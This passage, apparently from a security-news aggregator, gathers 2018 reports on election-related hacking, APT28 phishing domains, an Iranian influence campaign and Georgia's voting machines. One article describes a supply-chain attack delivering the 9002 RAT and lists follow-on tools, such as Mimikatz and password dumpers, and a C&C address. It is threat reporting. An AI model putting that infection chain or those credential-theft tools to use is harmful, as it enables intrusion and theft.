Huawei denied being financed to undertake research and development for the Chinese military, but the committee said it had received internal Huawei documents showing the company provided special network services to an entity alleged to be an elite cyber-warfare unit within the People's Liberation Army.

Lord, of Huawei Australia, at the time urged Australia not to be swayed by the U.S. report, which he said was about protectionism rather than security.


Attempt to Break Into Democratic Party Voter Data Thwarted
23.8.18 securityweek BigBrothers

An attempt to break into the Democratic National Committee’s massive voter database has been thwarted, a party official said Wednesday, two years after Russian operatives sent the party into disarray by hacking into its computers and facilitating the release of tens of thousands of emails amid the presidential election.

A web security firm using artificial intelligence uncovered the attempt. The DNC was notified Tuesday, it said. Hackers had created a fake login page to gather usernames and passwords in an effort to gain access to the Democratic Party’s voter file, a party official said. The file contains information on tens of millions of voters. The attempt was quickly thwarted by suspending the attacker’s account, and no information was compromised, the official said. The FBI was notified.

The official wasn’t authorized to speak about sensitive security information and spoke to The Associated Press on condition of anonymity.

Government and tech officials say it’s too early to know who was behind the attempt. The FBI declined to comment to the AP.

The attempt comes as Democrats gather for their summer meeting. The party’s cybersecurity has been an issue since the 2016 presidential election, when Russian hackers compromised DNC servers and publicly revealed internal communications that exploited divisions between Bernie Sanders’ and Hillary Clinton’s campaigns as the two candidates vied for the Democratic presidential nomination. Hackers also accessed the email accounts of Clinton’s campaign chairman, John Podesta, and systematically released the contents throughout the fall campaign.

It also comes a day after Microsoft announced it had uncovered similarly fraudulent websites created by Kremlin agents that spoofed two conservative outfits that are foes of Russia’s president, Vladimir Putin, presumably to trick unwitting visitors into surrendering credentials.

Bob Lord, the DNC’s chief security officer, said the attempt showed how serious the cyberthreat is and why it’s critical that state and federal officials work together on security.

“This attempt is further proof that there are constant threats as we head into midterm elections and we must remain vigilant in order to prevent future attacks,” Lord said in a statement.

He said President Donald Trump isn’t doing enough to protect American democracy. Previously, Trump mocked the DNC’s cybersecurity and cast doubt on U.S. intelligence officials’ findings that Russia was involved.

At a previously scheduled election security briefing Wednesday, Homeland Security Secretary Kirstjen Nielsen said the quick response to the attempted DNC hack showed that the system was working “and that different entities understand who to reach out to,” she said.

“Any attack on a political party or a campaign is important for us all to take seriously,” she said, emphasizing the government was doing all it could to help protect election systems ahead of the midterm elections. At stake is control of Congress, which could potentially switch from Republican to Democrat.

Amid the news, a Senate committee abruptly postponed a Wednesday vote on legislation to help states prevent against election hacking, frustrating Democrats and at least one Republican on the panel.

The vote was put off by the Senate Rules and Administration Committee after a bipartisan group of lawmakers spent months negotiating the legislation. The bill would aim to protect state election infrastructure by requiring that all states use backup paper ballots and conduct audits after elections, among other measures. It would also require DHS to immediately notify states if the federal government is aware that a state election system has been breached.

A Senate Republican aide said the vote was postponed because secretaries of state had complained about certain provisions, including the type of audits the bill would require. The aide said additional Republican support would be necessary to move the legislation out of committee. The aide was not authorized to speak about the committee’s reasoning and spoke on condition of anonymity.

Republican Sen. James Lankford of Oklahoma, one of the bill’s sponsors, said after the vote’s postponement: “Congressional inaction is unacceptable.”

The bill “will help states take necessary steps to further prepare our election infrastructure for the possibility of interference from not just Russia, but other possible adversaries like Iran or North Korea or a hacktivist group,” Lankford said.

The DNC committee attempt wasn’t mentioned at a Senate hearing on election security Wednesday, according to senators who were present.

States have been scrambling to secure their election systems since it was revealed that Russian hackers targeted election systems in at least 21 states in 2016, though the number is likely greater. There has been no indication any vote tallies were changed. Nielsen said at the briefing that states should have auditing systems in part as a safeguard so the public knows the vote tallies can be trusted.

In Tuesday’s incident, a scanning tool deployed by the San Francisco security company Lookout detected a masquerading website designed to harvest the passwords of users of the login page of NGP VAN, a technology provider used by the Democrats and other liberal-leaning political organizations, said Mike Murray, the company’s vice president of security intelligence. He said he contacted the DNC.

The tool, which leverages artificial intelligence, has been in development for a year and wasn’t tasked to scan any sites in particular but instead to identify phishing sites based on typical attributes, Murray said.

“This is the beauty of AI: It finds things that humans don’t know to look for,” he said.

He said the tool notified Lookout before the impostor page had even been populated with content. “As soon as we realized how fast it was developing, I decided to reach out to contacts that I know at the DNC.” Murray also contacted the website hosting company, Digital Ocean.

Ross Rustici, senior director for intelligence services at Cybereason in Boston, said a voter database is a juicy target for anyone trying to exacerbate political divisions in the U.S. or gain insight on political opponents.

“The data housed in these types of databases would be incredibly useful both for domestic opposition research as well as for foreign intelligence and counterintelligence purposes,” he said.


Operation Red Signature – South Korean Firms victims of a supply chain attack
23.8.18 securityaffairs BigBrothers

Supply Chain Attack Hits South Korean Firms
Security researchers from Trend Micro have uncovered a supply chain attack, tracked as Operation Red Signature, against organizations in South Korea.
The Operation Red Signature aimed at delivering a remote access Trojan (RAT) used by attackers to steal sensitive information from the victims.

Threat actors compromised update server of a remote support solutions provider, using this attack scheme hackers infected the victims with the 9002 RAT backdoor.

“Together with our colleagues at IssueMakersLab, we uncovered Operation Red Signature, an information theft-driven supply chain attack targeting organizations in South Korea. We discovered the attacks around the end of July, while the media reported the attack in South Korea on August 6.” reads the analysis published by TrendMicro.

The malicious code delivered by the attackers was signed with a valid digital certificate that was stolen, attackers also changed the configuration of the update server to deliver the malware only to organizations within a specified range of IP addresses.

According to Trend Micro, the attackers likely stole the code signing certificate in April and used it to sign the malicious update files then uploaded them on their servers.

Then the hackers compromised the server used to deliver the update and configured it to retrieve an update.zip file from the server controlled by the attackers.

Researchers observed that the 9002 RAT was also used to deliver additional payloads, such as an exploit tool for Internet Information Services (IIS) 6 WebDav (exploiting CVE-2017-7269) and an SQL database password dumper.

Hackers used the tools to steal data stored in their target’s web server and database.

supply chain attack Operation Red Signature

“The update.zip file contains an update.ini file, which has the malicious update configuration that specifies the remote support solution program to download file000.zip and file001.zip and extract them as rcview40u.dll and rcview.log to the installation folder.” continues the analysis.

“The program will then execute rcview40u.dll, signed with the stolen certificate, with Microsoft register server (regsvr32.exe). This dynamic-link library (DLL) is responsible for decrypting the encrypted rcview.log file and executing it in memory. 9002 RAT is the decrypted rcview.log payload, which connects to the command-and-control (C&C) server at 66[.]42[.]37[.]101.”

The analysis of the 9002 RAT backdoor revealed it was compiled on July 17, 18, and the configuration files inside update.zip were created on July 18. On July 18, the remote support program’s update process started, experts noticed that the 9002 RAT used supply chain attack was set to be inactive in August.

The RAT can fetch a long list of hacking tools reported in the following table:

Here’s a list of files that 9002 RAT retrieves and delivers to the affected system:

Filename Tool Purpose
dsget.exe DsGet View active directory objects
dsquery.exe DsQuery Search for active directory objects
sharphound.exe SharpHound Collect active directory information
aio.exe All In One (AIO) Publicly available hack tool
ssms.exe SQL Password dumper Dump password from SQL database
printdat.dll RAT (PlugX variant) Remote access tool
w.exe IIS 6 WebDav Exploit Tool Exploit tool for CVE-2017-7269 (IIS 6)
Web.exe WebBrowserPassView Recover password stored by browser
smb.exe Scanner Scans the system’s Windows version and computer name
m.exe Custom Mimikatz (including 32bit / 64bit file) Verify computer password and active directory credentials
“Supply chain attacks don’t just affect users and businesses — they exploit the trust between vendors and its clients or customers. By trojanizing software/applications or manipulating the infrastructures or platforms that run them, supply chain attacks affects the integrity and security of the goods and services that organizations provide,” Trend Micro concludes.


Iran-Linked Influence Campaign Targets US, Others
22.8.18 securityweek BigBrothers

Threat actors apparently working out of Iran have been conducting an operation whose goal is to influence the opinions of people in the United States and other countries around the world, FireEye reported on Tuesday.

This campaign, which the cybersecurity firm describes as an “influence operation,” involves a network of “inauthentic” news websites and clusters of social media accounts whose apparent purpose is to “promote political narratives in line with Iranian interests.”

The sites that FireEye calls “inauthentic” make an effort to hide their origins and affiliations, and rely on fake social media personas to promote content. This content is either original, copied from other sources, or taken from other sources and modified.Iran runs influence operation

The campaign, which has been active since at least 2017, focuses on anti-Israel, anti-Saudi, and pro-Palestine topics. The threat actor behind the operation has also distributed stories regarding U.S. policies that are favorable to Iran, including the Joint Comprehensive Plan of Action nuclear deal.

In addition to the United States, the group’s targets include the United Kingdom, Latin America and the Middle East.

FireEye researchers have found several pieces of evidence suggesting that Iran is behind the operation. This includes domains registered with email addresses associated with Iranian organizations, Twitter accounts registered with phone numbers with Iran’s +98 country code, and online personas promoting Iranian holidays.

However, the company says it’s only “moderately confident” that Iran is behind the activity, mainly due to the fact that this is an influence operation, which are meant to be deceptive.

The cybersecurity firm noted that the Iran-linked threat actor tracked as APT35, NewsBeef, Newscaster and Charming Kitten has also leveraged these types of inauthentic news sites and social media personas in its cyber espionage operations, but there is no evidence that this influence campaign has been conducted by APT35.

“The activity we have uncovered is significant and demonstrates that actors beyond Russia continue to engage in online, social media-driven influence operations as a means of shaping political discourse,” said Lee Foster, Manager of Information Operations Analysis at FireEye. “It also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.”

FireEye is preparing a report containing technical details on the operation. The report will be shared on request.


Microsoft Disrupts Election-Related Domains Used by Russian Hackers
22.8.18 securityweek BigBrothers

Microsoft on Monday announced that it took control of several domains associated with a notorious Russia-linked threat actor. The names of the domains suggest the hackers may have been using them in campaigns related to the upcoming midterm elections in the United States.

The tech giant’s Digital Crimes Unit obtained a court order to take control of six domains created by a threat group tracked as APT28, Fancy Bear, Pawn Storm, Strontium, Sednit, Tsar Team and Sofacy.

APT28, which experts believe is sponsored by Russia’s GRU intelligence agency, has been known to launch politics-focused campaigns, including ones aimed at the latest presidential elections in the United States and France. The group may now be targeting the upcoming midterm elections in the U.S.

The domains seized by Microsoft are my-iri.org, hudsonorg-my-sharepoint.com, senate.group, adfs-senate.services, adfs-senate.email and office365-onedrive.com.

The first domain appears to mimic the International Republican Institute, a non-profit that receives funding from the U.S. government to promote democracy around the world. The second domain appears to impersonate the Hudson Institute, a politically conservative non-profit think tank. The other domains mimic the website of the U.S. Senate and Microsoft’s Office 365 service.

While the domains may have been set up for election-related campaigns, Microsoft says it currently has no evidence that any of them were successfully used in attacks, and it’s unclear exactly who the hackers intended on targeting using these domains.

The company revealed last month that it had spotted some Microsoft phishing domains that had apparently been set up as part of attacks aimed at the campaigns of three congressional candidates who are running in the upcoming midterm elections.

“Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators,” Brad Smith, Microsoft’s president and chief legal officer, said in a blog post.

This is not the first time Microsoft has seized domains used by APT28. The company says it has used court orders a total of 12 times over the past two years to shut down 84 fake websites linked to the threat group.

Sean Sullivan, Security Advisor at F-Secure, cautioned that the domains targeted by Microsoft may not necessarily be related to elections.

“Microsoft’s announcement is generating a lot of attention and the focus is overwhelmingly centered on the 18 mid-term elections. But it’s important not to lose sight of the bigger issue,” Sullivan told SecurityWeek. “The focus on think tanks holding pro-sanction views on Russia’s current regime is about espionage. In short: spies are going to spy. That’s true whether or not it’s an election year. There seems to be a rush to conclude that these six domains are part of an “attack” on the elections that risks missing the complete threat model – and therefore the complete countermeasures that should be taken.”

Microsoft took this opportunity to announce its new AccountGuard initiative, which provides free cybersecurity protection to candidates, campaigns and political institutions using Office 365.

The AccountGuard service, which is part of Microsoft’s Defending Democracy Program, involves notifications about threats, security guidance and education, and the opportunity to test preview releases of new security features.

AccountGuard is currently available only in the United States, but Microsoft plans on offering it in other countries as well in the coming months.


Hacking Elections: Georgia's Midterm Electronic Voting in the Dock
22.8.18 securityweek BigBrothers

The security of electronic voting and the direct-recording election (DRE) voting machines used has been questioned for years. The upcoming U.S. midterm elections in November, coupled with the attempted Russian meddling in the 2016 presidential election, have made this a current and major concern for many in the security industry and beyond. Now it has gone to court.

Earlier this month (Aug. 3), the Coalition for Good Governance filed a Motion for Preliminary Injunction against the Secretary of State for Georgia (Brian Kemp, who is also the Republican candidate for governor in the midterms) seeking to force the state to abandon DREs and revert to a paper ballot.

The Secretary of State has responded to the Motion, claiming, “Such recklessness, if given the power of a federal decree, would compromise the public interest.”

Security concerns

Concern over the security of electronic voting was heightened following the 2016 presidential election. The incumbent Obama administration accused Russia of interfering and being behind a breach of the DNC and subsequent leak of sensitive data.

For the most part it is believed that Russia attempted to influence rather than control the vote. However, an NSA document acquired and discussed by The Intercept in June 2017 “raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.”

There is no claim that Russia affected the outcome of the election. The primary concern is that nobody knows the extent of what was done, nor what could have been done – and, more disconcertingly, what might be done next time.

The vulnerability of the DRE systems themselves is hardly doubted. At the end of 2016, both Cylance and Symantec separately demonstrated hacks against DREs. This month DEF CON ran its second annual Vote Hacking Village, where attendees were invited to hack the voting infrastructure, including DREs – and numerous vulnerabilities were found and exploited.

DRE manufacturers, and officials using them, are quick to point out most exploits require physical access to the machines, and that any individual hack would only affect the votes made on that system. The overall vote itself will remain statistically valid.

Last week (Aug. 13), a new survey from Venafi found that 93% of more than 400 IT security professionals from the U.S., UK and Australia found that “are concerned about cyber-attacks targeting election infrastructure and data.” Furthermore, “81% believe cyber criminals will target election data as it is transmitted between machines, software and hardware applications, and moved from local polling stations to central aggregation points.”

The voting infrastructure is much wider than vulnerable DREs alone.

Court case in Georgia

The Coalition for Good Governance is attempting to gain a court order to force Georgia to abandon electronic voting and go back to a paper-based ballot because it does not believe a full and fair vote can be guaranteed. It has asked for a Preliminary Injunction.

Georgia stands out from the majority of states. Although not one of the perennial swing votes, these midterms are likely to be different, and a relatively few votes could swing the result one way or the other.

Georgia uses approximately 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE. It does not and cannot produce a paper audit trail of votes. Georgia is one of just a few states – and the largest – that does not produce a paper backup.

The Coalition’s argument hinges on three elements: that DREs are inherently insecure; that Georgia’s voting system has already been breached; and that Georgia voting officials destroyed all evidence of who might have benefited from the breach.

The breach was discovered by security researcher Logan Lamb. The court document states, “In late August 2016, cybersecurity researcher Logan Lamb accessed files hosted on the elections.kennesaw.edu server on the public internet, including the voter histories and personal information of all Georgia voters, tabulation and memory card programming databases for past and future elections, instructions and passwords for voting equipment administration, and executable programs controlling essential election resources.”

This database, including registration details for 6.7 million Georgia voters, was unprotected and could be accessed by anybody with an internet connection.

Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, “If I were a hacker trying to affect an election in this state, that's where I would start. Because once you have access to those databases, you can, for example, on election day send people to the wrong polling stations. I actually think that this is a line of attack that people haven't looked at which has to do with simply changing contact information for voters.”

DeMillo is a professor at Georgia Tech, has worked in cybersecurity for more than 40 years, and, he says, is “a longtime observer of election security in the state of Georgia.” He is not an official advisor to the Coalition, but as an employee of a public university is available to offer advice to anyone who seeks it.

The concern for the Coalition is that firstly, Georgia did little to secure the database – it remained online and available to everyone for at least six months before it was removed; secondly, that Georgia did not undertake a forensic examination to determine whether the database had been altered or manipulated; and thirdly, three days after the Coalition’s lawsuit was filed, election officials “destroyed all data on the hard drives of the KSU elections.kennesaw.edu server.”

There is consequently now no way of knowing who may have accessed that database nor whether any unauthorized changes were made to it.

Marilyn R. Marks, VP and executive director of the Coalition for Good Governance, described another potential attack against the Georgia midterms that would be relatively easy if the pollbooks stored at KSU had been downloaded or amended by attackers.

“One of [Demillo’s] colleagues went to vote, and he was issued the wrong ballot (his affidavit is in the Exhibits of the Motion),” Marks told SecurityWeek. “Name is Kadel. He was given the wrong electronic ballot. If you look at his voter registration record, name address, everything's just fine. We do not know what happened.” His ballot paper seemed to be in order, but was for Congressional District 5 instead of Congressional District 6. Had he not noticed this discrepancy his vote would have been nullified.

“But here's another theoretical attack,” continued Marks. “You can leave all that stuff there. But change the ballot combination code that's in the electronic pollbook and the voter gets issued the wrong ballot. Nobody knows what their ballot combination is. It's not given out to voters.”

Rob Kadel is assistant director for research in education innovation, Center for 21st Century Universities at Georgia Tech.

The Secretary of State’s response to the Coalition’s motion is to concentrate on the physical problems of changing to paper at this stage. The response does not attempt to prove that DRE machines are secure, but states that the Coalition has not proven them to be insecure. It describes the motion as ‘Plaintiff’s paranoia’, and says, “Luddite prejudices against software technology are insufficient justification to override a statutory regime promulgated by duly-elected legislators, sustained against prior constitutional challenges, and overseen by state officials acting pursuant to their respective duties within that legislative framework.”

Both sides vehemently disagree. The Coalition was set to file its own reply to Kemp’s response on Monday (SecurityWeek will post the URLs to this and to Secretary Kemp’s initial response as soon as they become available). The reply is likely to assert that a switch to paper is feasible within the time constraints.

Industry views on the midterms in Georgia

The outcome of the Motion for Preliminary Injunction will be decided by the court, and probably very quickly. In the meantime, SecurityWeek talked to several security experts for their view on the current situation.

“The key to any voting system is the integrity of the data, and given the proven attacks against the DRE systems, this can no longer be guaranteed,” commented Joseph Kucic, CSO at Cavirin. “Without evidence of having the appropriate controls there is a good chance that the plaintiffs could win their case. With regard to the actual motion, any difficulties with paper ballot deployment – and there should not be many – are more than made up for by the potential risks of a compromised system.”

Not everyone agrees. Sanjay Kalra, co-founder and chief product officer at Lacework, told SecurityWeek, “Moving backwards to paper-based systems is not only inefficient, it’s also not materially any more secure. Hackers want to disrupt and steal, which they will do aggressively, irrespective of medium or platform. For those running digital election systems, the vision should be to use a best practices approach along with tools that support awareness and remediation to provide the best protection against bad actors. Those responsible for data protection must always seek to balance efficiency, user experience and security.”

“There’s a compelling case to be made on both sides,” says Abhishek Iyer, technical marketing manager at Demisto. Reverting to paper is supported by the general lack of confidence in the security of DREs and the known voter data leaks. “However,” he adds, “with impending midterm elections, there’s not enough time to execute an end-to-end change and go back to paper-based voting; improper transition could result in voter confusion, error, and inadvertent suppression (since electronic systems are also used to verify voter registration).”

Marilyn Marks disagrees. “There’s no new voting system needed, and no new equipment,” she told SecurityWeek. “They already use paper ballots (for example, for postal votes). They just need to dispense with the touchscreen machines, put paper votes into ballot boxes to be transported to the election office and use the scanners they already have to scan the votes in quantity. All that is needed is more of the same paper ballots – and the printers still have many weeks to do that.”

Ryan Jones, managing principal at Coalfire Labs, didn’t want to comment on any legal aspects between the Coalition for Good Governance and the secretary of state for Georgia. But he did say, “We have assessed not only voting machines, but also the Voluntary Voting System Guidelines standard – by which most voting machines are gauged – as well as the end-to-end gaps in pre-election, election, and post-election processes. We can say with some assurance,” he confirmed, “that machines in their current state, despite having met the VVSG standard, have many technical aspects that can be compromised by a diligent hacker that looks at the hacking challenge across the entire system and process. We have compromised multiple voting systems in a lab setting in as little as two minutes; and as news reports attest, an 11-year-old also recently hacked a voting environment at a security conference.” [DEF CON’s Vote Hacking Village.]

Last word goes to Professor Rich Demillo. “Georgia is the largest state that does not use auditable elections equipment; so, if I were in the attackers' shoes and was looking for a return on investment, this is the kind of state that I would look at -- a state where the races are likely to be tight and where the chance of me being discovered is going to be slim because by design it is impossible to verify after the election that there was a breach.”

It is now up to the court to decide whether well-documented flaws in the existing electronic voting infrastructure combined with the lack of any auditing capability are sufficiently serious to force a last-minute switch back to paper-based voting in the Georgia state midterm elections in November.


FBI Probes Computer Hacks in California House Campaigns
22.8.18 securityweek BigBrothers

HUNTINGTON BEACH, Calif. (AP) — The FBI launched investigations after two Southern California Democratic U.S. House candidates were targeted by computer hackers, though it's unclear whether politics had anything to do with the attacks.

A law enforcement official told The Associated Press the FBI looked into hacks involving David Min in the 45th Congressional District and Hans Keirstead in the adjacent 48th District. Both districts are in Orange County and are seen as potential pickups as the Democratic Party seeks to win control of the Congress in November.

A person with knowledge of the Min investigation told the AP on Monday that two laptops used by senior staffers for the candidate were found infected with malware in March. It's not clear what, if any, data was stolen, and there is no evidence the breach influenced the contest.

The CEO of a biomedical research company, Keirstead last summer was the victim of a broad "spear-phishing" attack, in which emails that appear to come from a friend or familiar source are designed to help hackers snatch sensitive or confidential information, the law enforcement official said. There is no evidence Keirstead lost valuable information.

The investigations so far have not turned up evidence the two candidates in Orange County were political targets.

The official and the knowledgeable person were not authorized to discuss the cases publicly and spoke only on condition of anonymity.

Keirstead was narrowly defeated in the June primary for the seat held by Republican Rep. Dana Rohrabacher. Min came in third in the contest to unseat Republican Rep. Mimi Walters.

Min's staff was alerted to a potential cyberattack by a facility manager in the software incubator where his campaign rented space. It was later found the computers were infected with software that records and sends keystrokes, with additional software that concealed it from conventional anti-virus tools used by the campaign.

Hackers also used a broad spear-phishing attack in an attempt to gain access, and FBI investigators are still piecing together additional details, the official said.

The two laptops were replaced, and Min's computer was not infected. The attack on the computers was first reported by Reuters.

Keirstead campaign officials detected repeated attempts to access the campaign's website.

Rolling Stone magazine, which first reported that cyberattack, said hackers or bots tried different username-password combinations in a rapid-fire sequence over a two-and-a-half-month period to get inside the campaign's WordPress-hosted website.

According to the campaign, there were also more than 130,000 so-called brute force attempts over a monthlong period to gain access to the campaign's server through the cloud-server company that hosted the Keirstead campaign's website, Rolling Stone said.

Computer security experts say that many attempts to gain access to a site hosted with the popular and free WordPress software is not unusual.

"Every WordPress hosted website sees 130,000 brute force attempts over a monthlong period, regardless whether it's Bohemian basket weaving, a blog about furry costume construction, or a politician website," said Robert Graham, a cybersecurity expert who created the BlackICE personal firewall.

"Hackers don't know or care who you are: they only care that you use WordPress," Graham said in a text message.

Min finished third behind fellow Democrat Katie Porter, who faces Walters in November. In the 48th District, Rohrabacher will face Democrat Harley Rouda, who snagged the second runoff spot by defeating Keirstead by 125 votes.


Russian Hackers Went After Conservative US Groups: Microsoft
22.8.18 securityweek BigBrothers

The Russian hacking unit that tried to interfere in the US presidential election has been targeting conservative US think tanks, Microsoft said.

Acting on a court order, the company last week seized control of six fake websites involved in such efforts, which also involved a site that mimicked the US Senate, Microsoft president Brad Smith said in a blog post Monday.

The hackers were linked to the Russian military intelligence agency known as the GRU, Smith wrote.

The idea was to have people think they were accessing links managed by these US political groups but redirect them to fake ones run by the hackers so passwords and other information could be stolen.

Smith said one such site appeared to mimic that of the International Republican Institute, which promotes democratic principles and whose board includes Republican senators, among them John McCain, who have been critical of President Vladimir Putin.

Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity.

"We're concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 18 elections," Smith wrote.

Experts said the aim was to go after anyone who opposes Putin.

"This is another demonstration of the fact that the Russians aren't really pursuing partisan attacks. They are pursuing attacks that they perceive in their own national self-interest," Eric Rosenbach, the director of the Defending Digital Democracy project at Harvard University, told the New York Times.

"It's about disrupting and diminishing any group that challenges how Putin's Russia is operating at home and around the world," Rosenbach added.

The Kremlin dismissed the fresh allegations, with spokesman Dmitry Peskov saying he did not know "which hackers are being talked about, what influencing of elections".

"We do not understand what Russian military intelligence has to do with this. What are the basis of such serious accusations? They should not be raised without some foundation," he told journalists.


Microsoft's Anti-Hacking Efforts Make it an Internet Cop
21.8.18 securityweek BigBrothers

Intentionally or not, Microsoft has emerged as a kind of internet cop by devoting considerable resources to thwarting Russian hackers.

The company's announcement Tuesday that it had identified and forced the removal of fake internet domains mimicking conservative U.S. political institutions triggered alarm on Capitol Hill and led Russian officials to accuse the company of participating in an anti-Russian "witch hunt."

Microsoft stands virtually alone among tech companies with an aggressive approach that uses U.S. courts to fight computer fraud and seize hacked websites back. In the process, it has acted more like a government detective than a global software giant.

In the case this week, the company did not just accidentally stumble onto a couple of harmless spoof websites. It seized the latest beachhead in an ongoing struggle against Russian hackers who meddled in the 2016 presidential election and a broader, decade-long legal fight to protect Microsoft customers from cybercrime.

"What we're seeing in the last couple of months appears to be an uptick in activity," Brad Smith, Microsoft's president and chief legal officer, said in an interview this week. Microsoft says it caught these particular sites early and that there's no evidence they were used in hacking.

The Redmond, Washington, company sued the hacking group best known as Fancy Bear in August 2016, saying it was breaking into Microsoft accounts and computer networks and stealing highly sensitive information from customers. The group, Microsoft said, would send "spear-phishing" emails that linked to realistic-looking fake websites in hopes targeted victims — including political and military figures — would click and betray their credentials.

The effort is not just a question of fighting computer fraud but of protecting trademarks and copyright, the company argues.

One email introduced as court evidence in 2016 showed a photo of a mushroom cloud and a link to an article about how Russia-U.S. tensions could trigger World War III. Clicking on the link might expose a user's computer to infection, hidden spyware or data theft.

An indictment from U.S. special counsel Robert Mueller has tied Fancy Bear to Russia's main intelligence agency, known as the GRU, and to the 2016 email hacking of both the Democratic National Committee and Democrat Hillary Clinton's presidential campaign.

Some security experts were skeptical about the publicity surrounding Microsoft's announcement, worried that it was an overblown reaction to routine surveillance of political organizations — potential cyberespionage honey pots— that never rose to the level of an actual hack.

The company also used its discovery as an opportunity to announce its new free security service to protect U.S. candidates, campaigns and political organizations ahead of the midterm elections.

But Maurice Turner, a senior technologist at the industry-backed Center for Democracy and Technology, said Microsoft is wholly justified in its approach to identifying and publicizing online dangers.

"Microsoft is really setting the standards with how public and how detailed they are with reporting out their actions," Turner said.

Companies including Microsoft, Google and Amazon are uniquely positioned to do this because their infrastructure and customers are affected. Turner said they "are defending their own hardware and their own software and to some extent defending their own customers."

Turner said he has not seen anyone in the industry as "out in front and open about" these issues as Microsoft.

As industry leaders, Microsoft's Windows operating systems had long been prime targets for viruses when in 2008 the company formed its Digital Crimes Unit, an international team of attorneys, investigators and data scientists. The unit became known earlier in this decade for taking down botnets, collections of compromised computers used as tools for financial crimes and denial-of-service attacks that overwhelm their targets with junk data.

Richard Boscovich, a former federal prosecutor and a senior attorney in Microsoft's digital crimes unit, testified to the Senate in 2014 about how Microsoft used civil litigation as a tactic. Boscovich is also involved in the fight against Fancy Bear, which Microsoft calls Strontium, according to court filings.

To attack botnets, Microsoft would take its fight to courts, suing on the basis of the federal Computer Fraud and Abuse Act and other laws and asking judges for permission to sever the networks' command-and-control structures.

"Once the court grants permission and Microsoft severs the connection between a cybercriminal and an infected computer, traffic generated by infected computers is either disabled or routed to domains controlled by Microsoft," Boscovich said in 2014.

He said the process of taking over the accounts, known as "sinkholing," enabled Microsoft to collect valuable evidence and intelligence used to assist victims.

In the latest action against Fancy Bear, a court order filed Monday allowed Microsoft to seize six new domains, which the company said were either registered or used at some point after April 20.

Smith said this week the company is still investigating how the newly discovered domains might have been used.

A security firm, Trend Micro, identified some of the same fake domains earlier this year. They mimicked U.S. Senate websites, while using standard Microsoft log-in graphics that made them appear legitimate, said Mark Nunnikhoven, Trend Micro's vice president of cloud research.

Microsoft has good reason to take them down, Nunnikhoven said, because they can hurt its brand reputation. But the efforts also fit into a broader tech industry mission to make the internet safer.

"If consumers are not comfortable and don't feel safe using digital products," they will be less likely to use them, Nunnikhoven said.


Microsoft says Russian hackers continue targeting 18 midterm elections
21.8.18 securityaffairs BigBrothers  APT

Microsoft has spotted a new hacking campaign targeting 18 midterm elections, the experts attributed the attacks to Russia-linked APT28 group.
Microsoft has spotted a new hacking campaign targeting 18 midterm elections.

The tech giant attributed to Russia-linked APT28 a series of cyber attacks aimed at Members of United States’ Senate, conservative organizations and think tanks.

The Russian APT group tracked as APT28 (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM) has been active since at least 2007 and operates under the Russian military agency GRU and continues to target US politicians.
According to Microsoft, the Russian cyberspies created at least six fake websites related to US Senate and conservative organizations to infect the visitors’ systems.

APT28 fake domains

Three bogus domains were created to appear as legitimate sites belonging to U.S. Senate, a fourth non-political website spoofed Microsoft’s online products.
The remaining websites were designed to mimic two U.S. conservative think tanks:

The Hudson Institute — a conservative Washington think tank.
The International Republican Institute (IRI) — a nonprofit group that promotes democracy worldwide and whose board includes prominent Republican figures like Sen. John McCain.
The fake sites were created over the past several months, hackers registered them with major web-hosting companies.

2018 midterm elections fake election websites
Microsoft did not provide further details on the attacks.

“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified targeted organizations.
At the time it is not possible to say if the fake attacks allowed the cyberspies to compromise the visitors’ machines, Microsoft’s post doesn’t mention any sinkhole investigation conducted by its experts.
Microsoft shut down dozens of other fake websites since 2016 after it has obtained the authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt hacking into US politics and for this reason, Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 18 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”

The discovery made by Microsoft is part of the Microsoft’s Defending Democracy Program launched in April that is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft announced also its initiative AccountGuard that provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.


